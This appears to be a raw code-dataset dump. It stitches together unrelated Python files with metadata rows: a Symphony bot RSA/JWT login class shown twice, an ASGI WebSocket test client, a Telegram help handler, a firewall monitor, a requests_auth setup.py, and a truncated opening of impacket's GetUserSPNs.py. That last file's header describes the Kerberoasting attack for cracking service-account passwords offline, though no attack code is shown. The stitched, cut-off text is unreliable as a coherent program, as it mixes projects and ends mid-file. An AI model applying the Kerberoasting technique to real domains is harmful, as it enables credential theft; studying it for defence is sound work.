"""Class for RSA authentication"""
def __init__(self, config):
"""
Set up proxy information if configuration contains proxyURL
:param config: Object contains all RSA configurations
"""
self.config = config
self.last_auth_time = 0
self.auth_retries = 0
self.session_token = None
self.key_manager_token = None
self.auth_session = requests.Session()
self.key_manager_auth_session = requests.Session()
self.auth_session.proxies.update(self.config.data['podProxyRequestObject'])
self.key_manager_auth_session.proxies.update(self.config.data['keyManagerProxyRequestObject'])
if self.config.data['truststorePath']:
logging.debug('truststore being added to requests library')
self.auth_session.verify = self.config.data['truststorePath']
self.key_manager_auth_session.verify = self.config.data['truststorePath']
def get_session_token(self):
"""Return the session token"""
return self.session_token
def get_key_manager_token(self):
"""Return the key manager token"""
return self.key_manager_token
def authenticate(self):
"""
Get the session and key manager token
"""
logging.debug('RSA Auth/authenticate()')
try:
if (self.last_auth_time == 0) or \
(int(round(time.time() * 1000) - self.last_auth_time >= auth_endpoint_constants['WAIT_TIME'])):
logging.debug('RSA Auth/authenticate() --> needed to authenticate')
self.last_auth_time = int(round(time.time() * 1000))
self.session_authenticate()
self.key_manager_authenticate()
else:
logging.debug('Retry authentication in 30 seconds.')
time.sleep(auth_endpoint_constants['TIMEOUT'])
self.authenticate()
except MaxRetryException as e:
logging.exception(e)
raise MaxRetryException
def create_jwt(self):
"""
Create a jwt token with payload dictionary. Encode with
RSA private key using RS512 algorithm
:return: A jwt token valid for < 290 seconds
"""
logging.debug('RSA_auth/getJWT() function started')
with open(self.config.data['botRSAPath'], 'r') as f:
content = f.readlines()
private_key = ''.join(content)
expiration_date = int(datetime.datetime.now(datetime.timezone.utc)
.timestamp() + (5*58))
payload = {
'sub': self.config.data['botUsername'],
'exp': expiration_date
}
encoded = jwt.encode(payload, private_key, algorithm='RS512')
f.close()
return encoded
def session_authenticate(self):
"""
Get the session token by calling API using jwt token
"""
logging.debug('RSA_auth/get_session_token() function started')
data = {
'token': self.create_jwt()
}
url = self.config.data['sessionAuthHost']+'/login/pubkey/authenticate'
response = self.auth_session.post(url, json=data)
if response.status_code != 200:
self.auth_retries += 1
if self.auth_retries > auth_endpoint_constants['MAX_RSA_RETRY']:
# raise UnauthorizedException('max auth retry limit: {}'.format(response.__dict__))
raise MaxRetryException('bot failed to authenticate more than 5 times.')
else:
logging.debug('RSA_auth/get_session_token() function failed: {}'.format(
response.status_code)
)
time.sleep(auth_endpoint_constants['TIMEOUT'])
self.session_authenticate()
else:
data = json.loads(response.text)
logging.debug('RSA/session token success')
self.session_token = data['token']
self.auth_retries = 0
def key_manager_authenticate(self):
"""
Get the key manager token by calling API using jwt token
"""
logging.debug('RSA_auth/get_keyauth()')
data = {
'token': self.create_jwt()
}
url = self.config.data['keyAuthHost']+'/relay/pubkey/authenticate'
response = self.key_manager_auth_session.post(url, json=data)
if response.status_code != 200:
self.auth_retries += 1
if self.auth_retries > auth_endpoint_constants['MAX_RSA_RETRY']:
raise MaxRetryException('bot failed to authenticate more than 5 times.')
else:
logging.debug('RSA_auth/get_key_manager_authenticate() function failed: {}'.format(
response.status_code)
)
time.sleep(auth_endpoint_constants['TIMEOUT'])
self.key_manager_authenticate()
else:
data = json.loads(response.text)
logging.debug('RSA/key manager token success')
self.key_manager_token = data['token']
self.auth_retries = 0
| 38.756944 | 115 | 0.612614 | import json
import requests
import datetime
import time
import logging
from .auth_endpoint_constants import auth_endpoint_constants
from requests import Session
from jose import jwt
from ..clients.api_client import APIClient
from ..exceptions.UnauthorizedException import UnauthorizedException
from ..exceptions.MaxRetryException import MaxRetryException
class SymBotRSAAuth(APIClient):
def __init__(self, config):
self.config = config
self.last_auth_time = 0
self.auth_retries = 0
self.session_token = None
self.key_manager_token = None
self.auth_session = requests.Session()
self.key_manager_auth_session = requests.Session()
self.auth_session.proxies.update(self.config.data['podProxyRequestObject'])
self.key_manager_auth_session.proxies.update(self.config.data['keyManagerProxyRequestObject'])
if self.config.data['truststorePath']:
logging.debug('truststore being added to requests library')
self.auth_session.verify = self.config.data['truststorePath']
self.key_manager_auth_session.verify = self.config.data['truststorePath']
def get_session_token(self):
return self.session_token
def get_key_manager_token(self):
return self.key_manager_token
def authenticate(self):
logging.debug('RSA Auth/authenticate()')
try:
if (self.last_auth_time == 0) or \
(int(round(time.time() * 1000) - self.last_auth_time >= auth_endpoint_constants['WAIT_TIME'])):
logging.debug('RSA Auth/authenticate() --> needed to authenticate')
self.last_auth_time = int(round(time.time() * 1000))
self.session_authenticate()
self.key_manager_authenticate()
else:
logging.debug('Retry authentication in 30 seconds.')
time.sleep(auth_endpoint_constants['TIMEOUT'])
self.authenticate()
except MaxRetryException as e:
logging.exception(e)
raise MaxRetryException
def create_jwt(self):
logging.debug('RSA_auth/getJWT() function started')
with open(self.config.data['botRSAPath'], 'r') as f:
content = f.readlines()
private_key = ''.join(content)
expiration_date = int(datetime.datetime.now(datetime.timezone.utc)
.timestamp() + (5*58))
payload = {
'sub': self.config.data['botUsername'],
'exp': expiration_date
}
encoded = jwt.encode(payload, private_key, algorithm='RS512')
f.close()
return encoded
def session_authenticate(self):
logging.debug('RSA_auth/get_session_token() function started')
data = {
'token': self.create_jwt()
}
url = self.config.data['sessionAuthHost']+'/login/pubkey/authenticate'
response = self.auth_session.post(url, json=data)
if response.status_code != 200:
self.auth_retries += 1
if self.auth_retries > auth_endpoint_constants['MAX_RSA_RETRY']:
raise MaxRetryException('bot failed to authenticate more than 5 times.')
else:
logging.debug('RSA_auth/get_session_token() function failed: {}'.format(
response.status_code)
)
time.sleep(auth_endpoint_constants['TIMEOUT'])
self.session_authenticate()
else:
data = json.loads(response.text)
logging.debug('RSA/session token success')
self.session_token = data['token']
self.auth_retries = 0
def key_manager_authenticate(self):
logging.debug('RSA_auth/get_keyauth()')
data = {
'token': self.create_jwt()
}
url = self.config.data['keyAuthHost']+'/relay/pubkey/authenticate'
response = self.key_manager_auth_session.post(url, json=data)
if response.status_code != 200:
self.auth_retries += 1
if self.auth_retries > auth_endpoint_constants['MAX_RSA_RETRY']:
raise MaxRetryException('bot failed to authenticate more than 5 times.')
else:
logging.debug('RSA_auth/get_key_manager_authenticate() function failed: {}'.format(
response.status_code)
)
time.sleep(auth_endpoint_constants['TIMEOUT'])
self.key_manager_authenticate()
else:
data = json.loads(response.text)
logging.debug('RSA/key manager token success')
self.key_manager_token = data['token']
self.auth_retries = 0
| true | true |
f7237489e702998835d1d11785ff1e504bcdfd13 | 4,104 | py | Python | async_asgi_testclient/websocket.py | kleschenko/async-asgi-testclient | f3243ea332b0a91f3990676aa850fdf68676ae93 | [
"MIT"
] | null | null | null | async_asgi_testclient/websocket.py | kleschenko/async-asgi-testclient | f3243ea332b0a91f3990676aa850fdf68676ae93 | [
"MIT"
] | null | null | null | async_asgi_testclient/websocket.py | kleschenko/async-asgi-testclient | f3243ea332b0a91f3990676aa850fdf68676ae93 | [
"MIT"
] | null | null | null | from async_asgi_testclient.utils import create_monitored_task
from async_asgi_testclient.utils import flatten_headers
from async_asgi_testclient.utils import make_test_headers_path_and_query_string
from async_asgi_testclient.utils import Message
from async_asgi_testclient.utils import receive
from http.cookies import SimpleCookie
from typing import Dict
from typing import Optional
import asyncio
import json
class WebSocketSession:
def __init__(
self,
testclient,
path,
headers: Optional[Dict] = None,
cookies: Optional[Dict] = None,
):
self.testclient = testclient
self.path = path
self.headers = headers or {}
self.cookies = cookies
self.input_queue: asyncio.Queue[dict] = asyncio.Queue()
self.output_queue: asyncio.Queue[dict] = asyncio.Queue()
async def __aenter__(self):
await self.connect()
return self
async def __aexit__(self, exc_type, exc, tb):
await self.close()
async def close(self, code: int = 1000):
await self._send({"type": "websocket.disconnect", "code": code})
async def send_str(self, data: str) -> None:
await self.send_text(data)
async def send_text(self, data: str) -> None:
await self._send({"type": "websocket.receive", "text": data})
async def send_bytes(self, data: bytes) -> None:
await self._send({"type": "websocket.receive", "bytes": data})
async def send_json(self, data, mode: str = "text") -> None:
assert mode in ["text", "binary"]
text = json.dumps(data)
if mode == "text":
await self._send({"type": "websocket.receive", "text": text})
else:
await self._send(
{"type": "websocket.receive", "bytes": text.encode("utf-8")}
)
async def _send(self, data):
self.input_queue.put_nowait(data)
async def receive_text(self) -> str:
message = await self._receive()
if message["type"] != "websocket.send":
raise Exception(message)
return message["text"]
async def receive_bytes(self) -> bytes:
message = await self._receive()
if message["type"] != "websocket.send":
raise Exception(message)
return message["bytes"]
async def receive_json(self):
message = await self._receive()
if message["type"] != "websocket.send":
raise Exception(message)
if "text" in message:
data = message["text"]
elif "bytes" in message:
data = message["bytes"]
else:
raise Exception(message)
return json.loads(data)
async def _receive(self):
return await receive(self.output_queue)
def __aiter__(self):
return self
async def __anext__(self):
msg = await self._receive()
if isinstance(msg, Message):
if msg.event == "exit":
raise StopAsyncIteration(msg)
return msg
async def connect(self):
tc = self.testclient
app = tc.application
headers, path, query_string_bytes = make_test_headers_path_and_query_string(
app, self.path, self.headers
)
if self.cookies is None: # use TestClient.cookie_jar
cookie_jar = tc.cookie_jar
else:
cookie_jar = SimpleCookie(self.cookies)
if cookie_jar and cookie_jar.output(header=""):
headers.add("Cookie", cookie_jar.output(header=""))
scope = {
"type": "websocket",
"headers": flatten_headers(headers),
"path": path,
"query_string": query_string_bytes,
"root_path": "",
"scheme": "http",
"subprotocols": [],
}
create_monitored_task(
app(scope, self.input_queue.get, self.output_queue.put),
self.output_queue.put_nowait,
)
await self._send({"type": "websocket.connect"})
msg = await self._receive()
assert msg["type"] == "websocket.accept"
| 31.328244 | 84 | 0.602827 | from async_asgi_testclient.utils import create_monitored_task
from async_asgi_testclient.utils import flatten_headers
from async_asgi_testclient.utils import make_test_headers_path_and_query_string
from async_asgi_testclient.utils import Message
from async_asgi_testclient.utils import receive
from http.cookies import SimpleCookie
from typing import Dict
from typing import Optional
import asyncio
import json
class WebSocketSession:
def __init__(
self,
testclient,
path,
headers: Optional[Dict] = None,
cookies: Optional[Dict] = None,
):
self.testclient = testclient
self.path = path
self.headers = headers or {}
self.cookies = cookies
self.input_queue: asyncio.Queue[dict] = asyncio.Queue()
self.output_queue: asyncio.Queue[dict] = asyncio.Queue()
async def __aenter__(self):
await self.connect()
return self
async def __aexit__(self, exc_type, exc, tb):
await self.close()
async def close(self, code: int = 1000):
await self._send({"type": "websocket.disconnect", "code": code})
async def send_str(self, data: str) -> None:
await self.send_text(data)
async def send_text(self, data: str) -> None:
await self._send({"type": "websocket.receive", "text": data})
async def send_bytes(self, data: bytes) -> None:
await self._send({"type": "websocket.receive", "bytes": data})
async def send_json(self, data, mode: str = "text") -> None:
assert mode in ["text", "binary"]
text = json.dumps(data)
if mode == "text":
await self._send({"type": "websocket.receive", "text": text})
else:
await self._send(
{"type": "websocket.receive", "bytes": text.encode("utf-8")}
)
async def _send(self, data):
self.input_queue.put_nowait(data)
async def receive_text(self) -> str:
message = await self._receive()
if message["type"] != "websocket.send":
raise Exception(message)
return message["text"]
async def receive_bytes(self) -> bytes:
message = await self._receive()
if message["type"] != "websocket.send":
raise Exception(message)
return message["bytes"]
async def receive_json(self):
message = await self._receive()
if message["type"] != "websocket.send":
raise Exception(message)
if "text" in message:
data = message["text"]
elif "bytes" in message:
data = message["bytes"]
else:
raise Exception(message)
return json.loads(data)
async def _receive(self):
return await receive(self.output_queue)
def __aiter__(self):
return self
async def __anext__(self):
msg = await self._receive()
if isinstance(msg, Message):
if msg.event == "exit":
raise StopAsyncIteration(msg)
return msg
async def connect(self):
tc = self.testclient
app = tc.application
headers, path, query_string_bytes = make_test_headers_path_and_query_string(
app, self.path, self.headers
)
if self.cookies is None:
cookie_jar = tc.cookie_jar
else:
cookie_jar = SimpleCookie(self.cookies)
if cookie_jar and cookie_jar.output(header=""):
headers.add("Cookie", cookie_jar.output(header=""))
scope = {
"type": "websocket",
"headers": flatten_headers(headers),
"path": path,
"query_string": query_string_bytes,
"root_path": "",
"scheme": "http",
"subprotocols": [],
}
create_monitored_task(
app(scope, self.input_queue.get, self.output_queue.put),
self.output_queue.put_nowait,
)
await self._send({"type": "websocket.connect"})
msg = await self._receive()
assert msg["type"] == "websocket.accept"
| true | true |
f7237499d6ef6b66f57eb9b6519906e628dd61dc | 2,892 | py | Python | Brain/Modules/help.py | AdityaTelange/Python-Telegram-Bot-SAMPLE-STRUCTURE- | cb166bd3bae5b27d404eecc272e2b41aa929738f | [
"MIT"
] | 6 | 2020-09-06T16:24:02.000Z | 2022-02-14T13:11:27.000Z | Brain/Modules/help.py | AdityaTelange/Python-Telegram-Bot-SAMPLE-STRUCTURE- | cb166bd3bae5b27d404eecc272e2b41aa929738f | [
"MIT"
] | null | null | null | Brain/Modules/help.py | AdityaTelange/Python-Telegram-Bot-SAMPLE-STRUCTURE- | cb166bd3bae5b27d404eecc272e2b41aa929738f | [
"MIT"
] | 1 | 2019-07-01T23:40:35.000Z | 2019-07-01T23:40:35.000Z | import re
from telegram import ParseMode, InlineKeyboardMarkup, InlineKeyboardButton
from telegram.chataction import ChatAction
from telegram.error import BadRequest
from telegram.ext.dispatcher import run_async
from Brain import Utils
from Brain.Modules.strings import logger, HELPER_SCRIPTS, HELP_STRINGS
@run_async
def help_button(update, context):
query = update.callback_query
suggestion_match = re.match(r"help_action=(.+?)", query.data)
back_button = re.match(r"help_back", query.data)
try:
if suggestion_match:
text = query.data.split('=', 1)[1]
context.args = text.split(' ') # update context.args
get_help(update, context)
elif back_button:
context.args = []
get_help(update, context)
# to ensure no spinning white circle
context.bot.answer_callback_query(query.id)
query.message.delete()
except BadRequest as e:
if e.message == "Message is not modified":
pass
elif e.message == "Query_id_invalid":
pass
elif e.message == "Message can't be deleted":
pass
else:
logger.exception("Exception in help buttons. %s", str(query.data))
# do not async
def send_help(update, text, keyboard=None):
logger.info("into send_help")
if not keyboard:
pass
update.effective_message.reply_text(text=text, parse_mode=ParseMode.MARKDOWN, reply_markup=keyboard)
@run_async
def get_help(update, context):
logger.info("into get_help")
chat = update.effective_chat
context.bot.send_chat_action(chat_id=chat.id, action=ChatAction.TYPING)
# ONLY send help in PM
if chat.type != chat.PRIVATE:
send_help(update, "Contact me in PM to get the list of possible commands.", InlineKeyboardMarkup(
[[InlineKeyboardButton(text="Help",
url="t.me/{}?start=help".format(
context.bot.username))]]))
return
elif len(context.args) >= 1 and any(context.args[0].lower() == x for x in HELPER_SCRIPTS):
module = context.args[0].lower()
text = "Here is the available help for the *{}* module:\n".format(module) \
+ HELPER_SCRIPTS[module]
send_help(update, text, InlineKeyboardMarkup([[InlineKeyboardButton(text="Back", callback_data="help_back")]]))
else:
button_list = []
for module in HELPER_SCRIPTS:
button_list.append(
InlineKeyboardButton(text="/{}".format(module),
callback_data="help_action={}".format(module), ))
reply_markup_keyboard = InlineKeyboardMarkup(Utils.build_menu(button_list, n_cols=2))
send_help(
update=update,
text=HELP_STRINGS,
keyboard=reply_markup_keyboard
) | 35.703704 | 119 | 0.63278 | import re
from telegram import ParseMode, InlineKeyboardMarkup, InlineKeyboardButton
from telegram.chataction import ChatAction
from telegram.error import BadRequest
from telegram.ext.dispatcher import run_async
from Brain import Utils
from Brain.Modules.strings import logger, HELPER_SCRIPTS, HELP_STRINGS
@run_async
def help_button(update, context):
query = update.callback_query
suggestion_match = re.match(r"help_action=(.+?)", query.data)
back_button = re.match(r"help_back", query.data)
try:
if suggestion_match:
text = query.data.split('=', 1)[1]
context.args = text.split(' ')
get_help(update, context)
elif back_button:
context.args = []
get_help(update, context)
context.bot.answer_callback_query(query.id)
query.message.delete()
except BadRequest as e:
if e.message == "Message is not modified":
pass
elif e.message == "Query_id_invalid":
pass
elif e.message == "Message can't be deleted":
pass
else:
logger.exception("Exception in help buttons. %s", str(query.data))
# do not async
def send_help(update, text, keyboard=None):
logger.info("into send_help")
if not keyboard:
pass
update.effective_message.reply_text(text=text, parse_mode=ParseMode.MARKDOWN, reply_markup=keyboard)
@run_async
def get_help(update, context):
logger.info("into get_help")
chat = update.effective_chat
context.bot.send_chat_action(chat_id=chat.id, action=ChatAction.TYPING)
# ONLY send help in PM
if chat.type != chat.PRIVATE:
send_help(update, "Contact me in PM to get the list of possible commands.", InlineKeyboardMarkup(
[[InlineKeyboardButton(text="Help",
url="t.me/{}?start=help".format(
context.bot.username))]]))
return
elif len(context.args) >= 1 and any(context.args[0].lower() == x for x in HELPER_SCRIPTS):
module = context.args[0].lower()
text = "Here is the available help for the *{}* module:\n".format(module) \
+ HELPER_SCRIPTS[module]
send_help(update, text, InlineKeyboardMarkup([[InlineKeyboardButton(text="Back", callback_data="help_back")]]))
else:
button_list = []
for module in HELPER_SCRIPTS:
button_list.append(
InlineKeyboardButton(text="/{}".format(module),
callback_data="help_action={}".format(module), ))
reply_markup_keyboard = InlineKeyboardMarkup(Utils.build_menu(button_list, n_cols=2))
send_help(
update=update,
text=HELP_STRINGS,
keyboard=reply_markup_keyboard
) | true | true |
f72374ee2fd64cbf7283cb678c83b8d8d0188e8c | 5,714 | py | Python | iemlav/lib/firewall/firewall_monitor.py | GouravRDutta/IemLabsAV | 8d397a3d59e067176269c5e84d73bf53951b7b3f | [
"MIT"
] | null | null | null | iemlav/lib/firewall/firewall_monitor.py | GouravRDutta/IemLabsAV | 8d397a3d59e067176269c5e84d73bf53951b7b3f | [
"MIT"
] | null | null | null | iemlav/lib/firewall/firewall_monitor.py | GouravRDutta/IemLabsAV | 8d397a3d59e067176269c5e84d73bf53951b7b3f | [
"MIT"
] | 1 | 2021-07-02T12:29:10.000Z | 2021-07-02T12:29:10.000Z | # -*- coding: utf-8 -*-
import re
import socket
import psutil
import time
from iemlav import logger
from iemlav.lib.firewall import utils
class FirewallMonitor(object):
"""Class for FirewallMonitor."""
module_name = "FirewallMonitor"
def __init__(self, interface=None, debug=False):
"""Initialize FirewallMonitor."""
self.logger = logger.IemlAVLogger(
self.module_name,
debug
)
self._SLEEP = 5
self.interface = interface
self.machine_ip = socket.gethostbyname(socket.gethostname())
self.open_ports = []
self.network_data = {
'bytes_sent': 0,
'bytes_recv': 0
}
self.process_list = []
self.services_list = []
def check_services(self):
"""
Scan for active services.
Args:
None
Returns:
None
Raises:
None
"""
result, error = utils.excecute_command('service --status-all')
if error:
self.logger.log(
"Scanning for servcies failed: " + str(error),
logtype="error"
)
if result:
services = re.findall(r'\[\s\+\s\]\s*([a-zA-Z0-9\-\_]*)',
result)
for service in services:
if service not in self.services_list:
self.services_list.append(service)
self.logger.log(
"Services: " + str(', '.join(self.services_list)),
logtype="info"
)
def check_open_ports(self):
"""
Scan for open ports and add to the open
port list.
Args:
None
Returns:
None
Raises:
None
"""
result, error = utils.excecute_command('netstat -anp')
if error:
self.logger.log(
"Scanning for open ports failed: " + str(error),
logtype="error"
)
if result:
open_ports = re.findall(r'(LISTENING|CONNECTED)\s+(\d+)(\s.*)',
result)
for port in open_ports:
if port[1] not in self.open_ports:
self.open_ports.append(port[1])
self.logger.log(
"Open ports: " + str(', '.join(self.open_ports)),
logtype="info"
)
def network_usage(self):
"""
Calculate the total bytes sent and received
over the selected interface.
Args:
None
Returns:
None
Raises:
None
"""
result = str(psutil.net_io_counters(pernic=True))
pattern = str(self.interface) + "':\s*snetio\(bytes_sent=(\d*),\s*bytes_recv=(\d*)"
network_data = re.findall(pattern,result)[0]
bytes_sent = int(network_data[0])
bytes_recv = int(network_data[1])
if self.network_data['bytes_sent'] != bytes_sent:
self.network_data['bytes_sent'] = bytes_sent
if self.network_data['bytes_recv'] != bytes_recv:
self.network_data['bytes_recv'] = bytes_recv
self.logger.log(
"Bytes sent: " + str(self.network_data['bytes_sent']),
logtype="info"
)
self.logger.log(
"Bytes received: " + str(self.network_data['bytes_recv']),
logtype="info"
)
def check_process(self):
"""
Check the currently running process.
Args:
None
Returns:
None
Raises:
None
"""
output, error = utils.excecute_command('ps -ef')
if error:
self.logger.log(
"Scanning for active process failed: " + str(error),
logtype="error"
)
if output:
process_details = re.findall(r'(\d{2}:\d{2})\s*?.*((\[|/)[a-zA-Z0-9\-/\]:_]*)',
output)
for process in process_details:
temp_dict = {process[0]: process[1].strip('/[]')}
self.process_list.append(temp_dict)
self.logger.log(
"Active process: " + str(self.process_list),
logtype="info"
)
def startMonitoring(self):
"""
Start firewall monitoring.
Args:
None
Returns:
None
Raises:
None
"""
current_time, error = utils.excecute_command('date')
if error:
self.logger.log(
"Time error: " + str(error),
logtype="error"
)
if current_time:
self.logger.log(
"Time: " + str(current_time),
logtype="info"
)
os_details, error = utils.excecute_command('uname -a')
if error:
self.logger.log(
"OS Detail error: " + str(error),
logtype="error"
)
if os_details:
self.logger.log(
"OS Details: " + str(os_details),
logtype="info"
)
while True:
# Wait for the required sleep seconds
time.sleep(self._SLEEP)
# Monitor process
self.check_process()
# Monitor network usage
self.network_usage()
# Monitor open ports
self.check_open_ports()
# Monitor running services
self.check_services()
| 24.951965 | 91 | 0.476724 |
import re
import socket
import psutil
import time
from iemlav import logger
from iemlav.lib.firewall import utils
class FirewallMonitor(object):
module_name = "FirewallMonitor"
def __init__(self, interface=None, debug=False):
self.logger = logger.IemlAVLogger(
self.module_name,
debug
)
self._SLEEP = 5
self.interface = interface
self.machine_ip = socket.gethostbyname(socket.gethostname())
self.open_ports = []
self.network_data = {
'bytes_sent': 0,
'bytes_recv': 0
}
self.process_list = []
self.services_list = []
def check_services(self):
result, error = utils.excecute_command('service --status-all')
if error:
self.logger.log(
"Scanning for servcies failed: " + str(error),
logtype="error"
)
if result:
services = re.findall(r'\[\s\+\s\]\s*([a-zA-Z0-9\-\_]*)',
result)
for service in services:
if service not in self.services_list:
self.services_list.append(service)
self.logger.log(
"Services: " + str(', '.join(self.services_list)),
logtype="info"
)
def check_open_ports(self):
result, error = utils.excecute_command('netstat -anp')
if error:
self.logger.log(
"Scanning for open ports failed: " + str(error),
logtype="error"
)
if result:
open_ports = re.findall(r'(LISTENING|CONNECTED)\s+(\d+)(\s.*)',
result)
for port in open_ports:
if port[1] not in self.open_ports:
self.open_ports.append(port[1])
self.logger.log(
"Open ports: " + str(', '.join(self.open_ports)),
logtype="info"
)
def network_usage(self):
result = str(psutil.net_io_counters(pernic=True))
pattern = str(self.interface) + "':\s*snetio\(bytes_sent=(\d*),\s*bytes_recv=(\d*)"
network_data = re.findall(pattern,result)[0]
bytes_sent = int(network_data[0])
bytes_recv = int(network_data[1])
if self.network_data['bytes_sent'] != bytes_sent:
self.network_data['bytes_sent'] = bytes_sent
if self.network_data['bytes_recv'] != bytes_recv:
self.network_data['bytes_recv'] = bytes_recv
self.logger.log(
"Bytes sent: " + str(self.network_data['bytes_sent']),
logtype="info"
)
self.logger.log(
"Bytes received: " + str(self.network_data['bytes_recv']),
logtype="info"
)
def check_process(self):
output, error = utils.excecute_command('ps -ef')
if error:
self.logger.log(
"Scanning for active process failed: " + str(error),
logtype="error"
)
if output:
process_details = re.findall(r'(\d{2}:\d{2})\s*?.*((\[|/)[a-zA-Z0-9\-/\]:_]*)',
output)
for process in process_details:
temp_dict = {process[0]: process[1].strip('/[]')}
self.process_list.append(temp_dict)
self.logger.log(
"Active process: " + str(self.process_list),
logtype="info"
)
def startMonitoring(self):
current_time, error = utils.excecute_command('date')
if error:
self.logger.log(
"Time error: " + str(error),
logtype="error"
)
if current_time:
self.logger.log(
"Time: " + str(current_time),
logtype="info"
)
os_details, error = utils.excecute_command('uname -a')
if error:
self.logger.log(
"OS Detail error: " + str(error),
logtype="error"
)
if os_details:
self.logger.log(
"OS Details: " + str(os_details),
logtype="info"
)
while True:
# Wait for the required sleep seconds
time.sleep(self._SLEEP)
# Monitor process
self.check_process()
# Monitor network usage
self.network_usage()
# Monitor open ports
self.check_open_ports()
# Monitor running services
self.check_services()
| true | true |
f723750f99457e168389453ca5bf016fae7541b3 | 2,300 | py | Python | setup.py | bottoy/requests_auth | f95ecd833d52341ebe0e2c974d133577ae124dd9 | [
"MIT"
] | 1 | 2020-04-02T02:29:56.000Z | 2020-04-02T02:29:56.000Z | setup.py | bottoy/requests_auth | f95ecd833d52341ebe0e2c974d133577ae124dd9 | [
"MIT"
] | null | null | null | setup.py | bottoy/requests_auth | f95ecd833d52341ebe0e2c974d133577ae124dd9 | [
"MIT"
] | null | null | null | import os
from setuptools import setup, find_packages
this_dir = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_dir, "README.md"), "r") as f:
long_description = f.read()
# More information on properties: https://packaging.python.org/distributing
setup(
name="requests_auth",
version=open("requests_auth/version.py").readlines()[-1].split()[-1].strip("\"'"),
author="Colin Bounouar",
author_email="colin.bounouar.dev@gmail.com",
maintainer="Colin Bounouar",
maintainer_email="colin.bounouar.dev@gmail.com",
url="https://colin-b.github.io/requests_auth/",
description="Authentication for Requests",
long_description=long_description,
long_description_content_type="text/markdown",
download_url="https://pypi.org/project/requests-auth/",
license="MIT",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Topic :: Software Development :: Build Tools",
],
keywords=[
"authentication",
"ntlm",
"oauth2",
"azure-active-directory",
"azure-ad",
"okta",
"apikey",
"multiple",
],
packages=find_packages(exclude=["tests*"]),
install_requires=[
# Used for Base Authentication and to communicate with OAuth2 servers
"requests==2.*"
],
extras_require={
"testing": [
# Used to generate test tokens
"pyjwt==1.*",
# Used to mock responses to requests
"pytest-responses==0.4.*",
# Used to check coverage
"pytest-cov==2.*",
]
},
python_requires=">=3.6",
project_urls={
"GitHub": "https://github.com/Colin-b/requests_auth",
"Changelog": "https://github.com/Colin-b/requests_auth/blob/master/CHANGELOG.md",
"Issues": "https://github.com/Colin-b/requests_auth/issues",
},
platforms=["Windows", "Linux"],
)
| 34.328358 | 89 | 0.61 | import os
from setuptools import setup, find_packages
this_dir = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_dir, "README.md"), "r") as f:
long_description = f.read()
setup(
name="requests_auth",
version=open("requests_auth/version.py").readlines()[-1].split()[-1].strip("\"'"),
author="Colin Bounouar",
author_email="colin.bounouar.dev@gmail.com",
maintainer="Colin Bounouar",
maintainer_email="colin.bounouar.dev@gmail.com",
url="https://colin-b.github.io/requests_auth/",
description="Authentication for Requests",
long_description=long_description,
long_description_content_type="text/markdown",
download_url="https://pypi.org/project/requests-auth/",
license="MIT",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Topic :: Software Development :: Build Tools",
],
keywords=[
"authentication",
"ntlm",
"oauth2",
"azure-active-directory",
"azure-ad",
"okta",
"apikey",
"multiple",
],
packages=find_packages(exclude=["tests*"]),
install_requires=[
# Used for Base Authentication and to communicate with OAuth2 servers
"requests==2.*"
],
extras_require={
"testing": [
# Used to generate test tokens
"pyjwt==1.*",
# Used to mock responses to requests
"pytest-responses==0.4.*",
# Used to check coverage
"pytest-cov==2.*",
]
},
python_requires=">=3.6",
project_urls={
"GitHub": "https://github.com/Colin-b/requests_auth",
"Changelog": "https://github.com/Colin-b/requests_auth/blob/master/CHANGELOG.md",
"Issues": "https://github.com/Colin-b/requests_auth/issues",
},
platforms=["Windows", "Linux"],
)
| true | true |
f723757147c0b88be1037f2756655a023f28d617 | 20,134 | py | Python | examples/GetUserSPNs.py | grkoll/impacket | 90a91045139659d83409af1771dcaf697c00de99 | [
"Apache-1.1"
] | null | null | null | examples/GetUserSPNs.py | grkoll/impacket | 90a91045139659d83409af1771dcaf697c00de99 | [
"Apache-1.1"
] | null | null | null | examples/GetUserSPNs.py | grkoll/impacket | 90a91045139659d83409af1771dcaf697c00de99 | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module will try to find Service Principal Names that are associated with normal user account.
# Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request
# will encrypt the ticket with the account the SPN is running under, this could be used for an offline
# bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
# This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at
# https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
#
# Original idea of implementing this in Python belongs to @skelsec and his
# https://github.com/skelsec/PyKerberoast project
#
# This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.
# Also, disabled accounts won't be shown.
#
# ToDo:
# [X] Add the capability for requesting TGS and output them in JtR/hashcat format
# [ ] Improve the search filter, we have to specify we don't want machine accounts in the answer
# (play with userAccountControl)
#
import argparse
import logging
import os
import sys
from datetime import datetime
from binascii import hexlify, unhexlify
from pyasn1.codec.der import decoder
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_NORMAL_ACCOUNT
from impacket.examples import logger
from impacket.krb5 import constants
from impacket.krb5.asn1 import TGS_REP
from impacket.krb5.ccache import CCache
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5.types import Principal
from impacket.ldap import ldap, ldapasn1
from impacket.smbconnection import SMBConnection
class GetUserSPNs:
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
